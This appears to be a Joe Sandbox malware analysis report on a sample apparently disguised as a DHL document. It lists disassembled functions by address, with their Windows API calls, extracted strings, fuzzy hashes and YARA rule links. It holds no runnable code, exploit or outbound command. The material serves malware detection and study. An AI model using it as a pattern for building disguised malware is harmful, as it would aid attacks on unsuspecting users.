Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 163f7eb3d468be947c5ef46d525a91f0046817df36641b17e2b36d0cab5e8113
Instruction ID: 67f0fff8d178dad98fcd44aa0ef0b58ee516ee17cb7a084a7ffe71f7c2ac3f2b
Opcode Fuzzy Hash: 163f7eb3d468be947c5ef46d525a91f0046817df36641b17e2b36d0cab5e8113
Instruction Fuzzy Hash: 53415370E083196BDB109FBA8C49D6EFFB8EF51B50B10452BE509E7291DAB89401CE61

Function 0092AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0092AAA5
__swprintf.LIBCMT ref: 0092AB46
_wcscmp.LIBCMT ref: 0092AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0092ABAE
_wcscmp.LIBCMT ref: 0092ABEA
GetClassNameW.USER32(?,?,00000400), ref: 0092AC21
GetDlgCtrlID.USER32(?), ref: 0092AC73
GetWindowRect.USER32(?,?), ref: 0092ACA9
GetParent.USER32(?), ref: 0092ACC7
ScreenToClient.USER32(00000000), ref: 0092ACCE
GetClassNameW.USER32(?,?,00000100), ref: 0092AD48
_wcscmp.LIBCMT ref: 0092AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 0092AD82
_wcscmp.LIBCMT ref: 0092AD96

Part of subcall function 008F386C: _iswctype.LIBCMT ref: 008F3874

Strings

%s%u, xrefs: 0092AB40

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: de095ad93c8ee894d1bbaad6d04f45f1706180af5e3919dc47c880c664c59643
Instruction ID: 25909872810f6ad264a32c1b5cfc6adb52945e00fecb3b5574b9cbe8ab5d5aff
Opcode Fuzzy Hash: de095ad93c8ee894d1bbaad6d04f45f1706180af5e3919dc47c880c664c59643
Instruction Fuzzy Hash: C5A1E072204726AFDB14EF24E884BAAF7ECFF44315F104629F999D2194DB30E945CB92

Function 0092B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0092B3DB
_wcscmp.LIBCMT ref: 0092B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0092B414
CharUpperBuffW.USER32(?,00000000), ref: 0092B431
_wcscmp.LIBCMT ref: 0092B44F
_wcsstr.LIBCMT ref: 0092B460
GetClassNameW.USER32(00000018,?,00000400), ref: 0092B498
_wcscmp.LIBCMT ref: 0092B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0092B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 0092B518
_wcscmp.LIBCMT ref: 0092B528
GetClassNameW.USER32(00000010,?,00000400), ref: 0092B550
GetWindowRect.USER32(00000004,?), ref: 0092B5B9

Strings

ThumbnailClass, xrefs: 0092B4A3, 0092B523
@, xrefs: 0092B3BC

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 46d8ef9e0effaa56854ea83898d2f999b2b90f5f557b63d6169919597972b78d
Instruction ID: b5c92f45a5a59be1d9b3f221f40097d7daa4b500b02772e9492245d6785b9113
Opcode Fuzzy Hash: 46d8ef9e0effaa56854ea83898d2f999b2b90f5f557b63d6169919597972b78d
Instruction Fuzzy Hash: F081C0710083199BDB00DF14E885FAA7BECFF44324F18856AFD858A1AADB34DD45CBA1

Function 0092B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0092B23F

Strings

ACTIVE, xrefs: 0092B21A
[LAST, xrefs: 0092B2EC
CLASSNAME=, xrefs: 0092B27C
[ALL, xrefs: 0092B2E5
[CLASS:, xrefs: 0092B28F
LAST, xrefs: 0092B204
HANDLE=, xrefs: 0092B238
[ACTIVE, xrefs: 0092B22C
[HANDLE:, xrefs: 0092B24B
[REGEXPTITLE:, xrefs: 0092B267
ALL, xrefs: 0092B2D3
REGEXP=, xrefs: 0092B254

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 9e49d7a38aa7afc9e78f408786ba5ea815bd712573ddb15f8ab502b41406ba12
Instruction ID: 349b10a32f76477bc0ba07e59d61b1e32ff5a229b56d0547e2c650c75660292d
Opcode Fuzzy Hash: 9e49d7a38aa7afc9e78f408786ba5ea815bd712573ddb15f8ab502b41406ba12
Instruction Fuzzy Hash: BF31E331544329E6DB14FA64DD43EFE77A8FF20754F64051AB412B12D9FF116E04C652

Function 0092C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0092C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0092C4E6
SetWindowTextW.USER32(?,?), ref: 0092C4FD
GetDlgItem.USER32(?,000003EA), ref: 0092C512
SetWindowTextW.USER32(00000000,?), ref: 0092C518
GetDlgItem.USER32(?,000003E9), ref: 0092C528
SetWindowTextW.USER32(00000000,?), ref: 0092C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0092C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0092C569
GetWindowRect.USER32(?,?), ref: 0092C572
SetWindowTextW.USER32(?,?), ref: 0092C5DD
GetDesktopWindow.USER32 ref: 0092C5E3
GetWindowRect.USER32(00000000), ref: 0092C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0092C636
GetClientRect.USER32(?,?), ref: 0092C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0092C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0092C693

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: dce078018822b6618a0aeaf17117d98aec2f7c44c30151ed41b57390684ffb7b
Instruction ID: edfbd3059b8f99149ec76eec8de9216169a7772d8e7e9c342b3ea8320f936587
Opcode Fuzzy Hash: dce078018822b6618a0aeaf17117d98aec2f7c44c30151ed41b57390684ffb7b
Instruction Fuzzy Hash: E8517A71900709AFDB209FA9DE89F6FBBF9FF04705F004928E686A25A4C775E904DB50

Function 0095A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0095A4C8
DestroyWindow.USER32(?,?), ref: 0095A542

Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0095A5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0095A5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0095A5F1
DestroyWindow.USER32(00000000), ref: 0095A613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008D0000,00000000), ref: 0095A64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0095A663
GetDesktopWindow.USER32 ref: 0095A67C
GetWindowRect.USER32(00000000), ref: 0095A683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0095A69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0095A6B3

Part of subcall function 008D25DB: GetWindowLongW.USER32(?,000000EB), ref: 008D25EC

Strings

0, xrefs: 0095A4DE
tooltips_class32, xrefs: 0095A5B5, 0095A643

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 32737b73eb9979a5e4b95c8c86bdd316f2109fd0d84481693cbcd4ba2fdbdc44
Instruction ID: 54688f0d99a070ae1c5ccd2383360d3198596cd46d1264d92cc09ea6979d50ca
Opcode Fuzzy Hash: 32737b73eb9979a5e4b95c8c86bdd316f2109fd0d84481693cbcd4ba2fdbdc44
Instruction Fuzzy Hash: 7D71E174154309AFD720CF29DC59F6A7BEAFB88315F08062DF985872A0D770E90ADB16

Function 0095C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623

DragQueryPoint.SHELL32(?,?), ref: 0095C917

Part of subcall function 0095ADF1: ClientToScreen.USER32(?,?), ref: 0095AE1A
Part of subcall function 0095ADF1: GetWindowRect.USER32(?,?), ref: 0095AE90
Part of subcall function 0095ADF1: PtInRect.USER32(?,?,0095C304), ref: 0095AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 0095C980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0095C98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0095C9AE
_wcscat.LIBCMT ref: 0095C9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0095C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 0095CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 0095CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 0095CA47
DragFinish.SHELL32(?), ref: 0095CA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0095CB41

Strings

@GUI_DROPID, xrefs: 0095CA6E
@GUI_DRAGFILE, xrefs: 0095CAF0
@GUI_DRAGID, xrefs: 0095CAB9

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 6fabbcd98335636c3065b8dd408aa876545cc7835ef76a646b57a00e4041376c
Instruction ID: 4d44e8b9006a5d0432929c6b91610abe3b6ac66d9d717741e203a97ea7499a99
Opcode Fuzzy Hash: 6fabbcd98335636c3065b8dd408aa876545cc7835ef76a646b57a00e4041376c
Instruction Fuzzy Hash: 05615771108311AFC711EF69CC95E9BBBE8FF88754F000A2EF591922A1DB709A49CB52

Function 00954619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009546AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009546F6

Strings

CHECK, xrefs: 00954716
UNCHECK, xrefs: 009548D2
EXPAND, xrefs: 009547A8
GETITEMCOUNT, xrefs: 009547D8
SELECT, xrefs: 009548A7
EXISTS, xrefs: 0095475F
COLLAPSE, xrefs: 0095473C
GETTOTALCOUNT, xrefs: 009546DD
GETTEXT, xrefs: 00954849
ISCHECKED, xrefs: 00954879
GETSELECTED, xrefs: 00954806

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 4845cd0d99e6b75963ec32f7acac759e52ba8e0bd5791d0b204dc6e3a99e3f83
Instruction ID: ff3b456205c0c297b7281687a8767c847984ff7c6d4df57b9e82d5ee678e7efa
Opcode Fuzzy Hash: 4845cd0d99e6b75963ec32f7acac759e52ba8e0bd5791d0b204dc6e3a99e3f83
Instruction Fuzzy Hash: 63917B342043159FCB14EF25C461A6ABBA5FF85318F04495DFC969B3A2CB34ED4ACB82

Function 0095BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0095BB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00959431), ref: 0095BBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0095BC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0095BC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0095BC7D
FreeLibrary.KERNEL32(?), ref: 0095BC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0095BC99
DestroyIcon.USER32(?,?,?,?,?,00959431), ref: 0095BCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0095BCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0095BCD1

Part of subcall function 008F313D: __wcsicmp_l.LIBCMT ref: 008F31C6

Strings

.icl, xrefs: 0095BAE4
.dll, xrefs: 0095BB27
.exe, xrefs: 0095BB04

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 661a2f5ffcb670b7cf6b81b280283f1ed001c1ff28388c8ca989d2eb1571e435
Instruction ID: a507c30a6f9bb4845098f6d3f3003213af750afcf94bb108adc12b2463bcb9ff
Opcode Fuzzy Hash: 661a2f5ffcb670b7cf6b81b280283f1ed001c1ff28388c8ca989d2eb1571e435
Instruction Fuzzy Hash: B5610271500219BAEB14DF69CC45FBE7BACFB08722F104219FD15D61C0DB74AA94DBA0

Function 0093A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C

CharLowerBuffW.USER32(?,?), ref: 0093A636
GetDriveTypeW.KERNEL32 ref: 0093A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093A730

Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66

Strings

wait, xrefs: 0093A6ED
closed, xrefs: 0093A64A, 0093A653
close cd wait, xrefs: 0093A71B
close, xrefs: 0093A63C
open , xrefs: 0093A692
set cd door , xrefs: 0093A6D1
type cdaudio alias cd wait, xrefs: 0093A6AE
open, xrefs: 0093A65D

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 42f9c32ccc3945c8fadc8a18085d29b719de01c4fa9e7fd349d1ca17f52f86e3
Instruction ID: 366db89d8c7abf375c1cb473daf004bad58ada480267cb97eea26f188035c1f0
Opcode Fuzzy Hash: 42f9c32ccc3945c8fadc8a18085d29b719de01c4fa9e7fd349d1ca17f52f86e3
Instruction Fuzzy Hash: B35138711043059FD710EF24C89196AB7E8FF94718F044A6EF89697361EB35AE0ACB52

Function 0093A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0093A47A
__swprintf.LIBCMT ref: 0093A49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 0093A4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0093A4FE
_memset.LIBCMT ref: 0093A51D
_wcsncpy.LIBCMT ref: 0093A559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0093A58E
CloseHandle.KERNEL32(00000000), ref: 0093A599
RemoveDirectoryW.KERNEL32(?), ref: 0093A5A2
CloseHandle.KERNEL32(00000000), ref: 0093A5AC

Strings

\, xrefs: 0093A4B2
:, xrefs: 0093A4BD
\??\%s, xrefs: 0093A496

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 240514883a5a7f324089f8313e17712dc55e9bdb7cc81c5fec673563daf55dd3
Instruction ID: 1501c0cda75ec97e8c5aa93bfd7981035b8d68018589f85215a56aad4fe07468
Opcode Fuzzy Hash: 240514883a5a7f324089f8313e17712dc55e9bdb7cc81c5fec673563daf55dd3
Instruction Fuzzy Hash: 5531BEB2604209ABDB219FA1DC48FEF33BCEF88751F1040B6FA08D6160EB7096448B25

Function 0093DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0093DC7B
_wcscat.LIBCMT ref: 0093DC93
_wcscat.LIBCMT ref: 0093DCA5
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0093DCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 0093DCCE
GetFileAttributesW.KERNEL32(?), ref: 0093DCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 0093DD00
SetCurrentDirectoryW.KERNEL32(?), ref: 0093DD12

Strings

*.*, xrefs: 0093DD51

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 96a79ffec15e94ac1875da63fd8e4bedad1ab088aef873a9bbc545b345cae3f9
Instruction ID: 90fdfcf1e6c905882c69ae68d4623716c7aa375a13199dbd8d48b5d3350ad353
Opcode Fuzzy Hash: 96a79ffec15e94ac1875da63fd8e4bedad1ab088aef873a9bbc545b345cae3f9
Instruction Fuzzy Hash: 6E8180725153459FCB24EF28D8659AAB7E8FB88310F198C2EF899C7250EB34D944CF52

Function 0095C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0095C4EC
GetFocus.USER32 ref: 0095C4FC
GetDlgCtrlID.USER32(00000000), ref: 0095C507
_memset.LIBCMT ref: 0095C632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0095C65D
GetMenuItemCount.USER32(?), ref: 0095C67D
GetMenuItemID.USER32(?,00000000), ref: 0095C690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0095C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0095C70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0095C744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0095C779

Strings

0, xrefs: 0095C62A

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 332d54f03c12242f44831f097d01d9d882338de8b6e031abcbd8aa41f9d435d8
Instruction ID: 282981d862cc4af99946fa62313c0657b09769c95aa36d55d9b2271b878aa6b5
Opcode Fuzzy Hash: 332d54f03c12242f44831f097d01d9d882338de8b6e031abcbd8aa41f9d435d8
Instruction Fuzzy Hash: D68180B0209305AFD710CF26C984A6BBBE8FB88355F10492EFD9597291D770E909DF92

Function 009283F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0092874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00928766
Part of subcall function 0092874A: GetLastError.KERNEL32(?,0092822A,?,?,?), ref: 00928770
Part of subcall function 0092874A: GetProcessHeap.KERNEL32(00000008,?,?,0092822A,?,?,?), ref: 0092877F
Part of subcall function 0092874A: HeapAlloc.KERNEL32(00000000,?,0092822A,?,?,?), ref: 00928786
Part of subcall function 0092874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0092879D

Part of subcall function 009287E7: GetProcessHeap.KERNEL32(00000008,00928240,00000000,00000000,?,00928240,?), ref: 009287F3
Part of subcall function 009287E7: HeapAlloc.KERNEL32(00000000,?,00928240,?), ref: 009287FA
